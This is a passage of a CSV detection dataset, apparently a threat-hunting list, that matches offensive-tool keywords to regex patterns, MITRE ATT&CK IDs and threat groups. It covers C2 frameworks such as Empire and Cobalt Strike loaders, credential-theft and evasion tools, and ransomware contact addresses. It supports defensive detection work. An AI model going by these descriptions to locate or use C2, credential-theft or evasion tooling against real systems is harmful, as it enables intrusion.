"*ElevenPaths*FOCA*",".{0,1000}ElevenPaths.{0,1000}FOCA.{0,1000}","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. 
for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Reconnaissance","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","N/A","10","3160","575","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z","43062" "*ELFLoader.c*",".{0,1000}ELFLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","43064" "*ELFLoader.h*",".{0,1000}ELFLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","43065" 
"*ELFLoader.out*",".{0,1000}ELFLoader\.out.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","43066" "*EliteLoser/PSnmap*",".{0,1000}EliteLoser\/PSnmap.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black 
Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","43068" "*elite-proxy-finder*",".{0,1000}elite\-proxy\-finder.{0,1000}","offensive_tool_keyword","elite-proxy-finder","Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.","T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - T1134.002 - T1016.001","TA0011 - TA0010 - TA0005 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/DanMcInerney/elite-proxy-finder","1","1","N/A","N/A","N/A","3","251","96","2016-11-23T10:31:33Z","2014-04-17T11:23:20Z","43069" "*ElJaviLuki/CobaltStrike_OpenBeacon*",".{0,1000}ElJaviLuki\/CobaltStrike_OpenBeacon.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","1","N/A","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","43070" "*ellen0xffff@proton.me*",".{0,1000}ellen0xffff\@proton\.me.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43071" "*ElliotKillick/LdrLockLiberator*",".{0,1000}ElliotKillick\/LdrLockLiberator.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator 
is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","43072" "*elnerd/Get-NetNTLM*",".{0,1000}elnerd\/Get\-NetNTLM.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","1","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","43073" "*elusiveMice.x64.o*",".{0,1000}elusiveMice\.x64\.o.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","43074" "*elusiveMice.x86.o*",".{0,1000}elusiveMice\.x86\.o.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","43075" "*Email Password-Recovery*",".{0,1000}Email\s\sPassword\-Recovery.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43077" 
"*emailall.py -*",".{0,1000}emailall\.py\s\-.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","43078" "*emailall.py check*",".{0,1000}emailall\.py\scheck.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","43079" "*EmailAll-master.*",".{0,1000}EmailAll\-master\..{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","43080" "*embargobe3n5okxyzqphpmk3moinoap2snz5k6765mvtkk7hhi544jid.onion*",".{0,1000}embargobe3n5okxyzqphpmk3moinoap2snz5k6765mvtkk7hhi544jid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43081" "*embedInHTML.html*",".{0,1000}embedInHTML\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43082" "*embedInHTML.py*",".{0,1000}embedInHTML\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43083" "*EmbedInHTML-master*",".{0,1000}EmbedInHTML\-master.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43084" "*emdnaia/RustPotato*",".{0,1000}emdnaia\/RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","1","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","43085" "*emeric.nasi@sevagas.com*",".{0,1000}emeric\.nasi\@sevagas\.com.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#email","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","43087" "*emilarner/revsocks*",".{0,1000}emilarner\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","1","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","43088" "*empire AttackServers*",".{0,1000}empire\sAttackServers.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","43089" "*Empire Framework GUI*",".{0,1000}Empire\sFramework\sGUI.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","43090" "*empire --rest *",".{0,1000}empire\s\-\-rest\s.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 
- T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43091" "*empire --server *",".{0,1000}empire\s\-\-server\s.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","43092" "*Empire.Agent.Coms.*",".{0,1000}Empire\.Agent\.Coms\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43093" "*Empire.Agent.cs*",".{0,1000}Empire\.Agent\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI 
Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43094" "*Empire.Agent.Jobs.cs*",".{0,1000}Empire\.Agent\.Jobs\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43095" "*Empire.Agent.Stager.*",".{0,1000}Empire\.Agent\.Stager\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43096" "*empire.server.api.v2*",".{0,1000}empire\.server\.api\.v2.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 
T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43097" "*empire/client/*.py*",".{0,1000}empire\/client\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - 
LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43098" "*empire/server/*.py*",".{0,1000}empire\/server\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43099" "*empire/server/downloads/*",".{0,1000}empire\/server\/downloads\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration 
Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43100" "*empire/server/downloads/logs/*",".{0,1000}empire\/server\/downloads\/logs\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - 
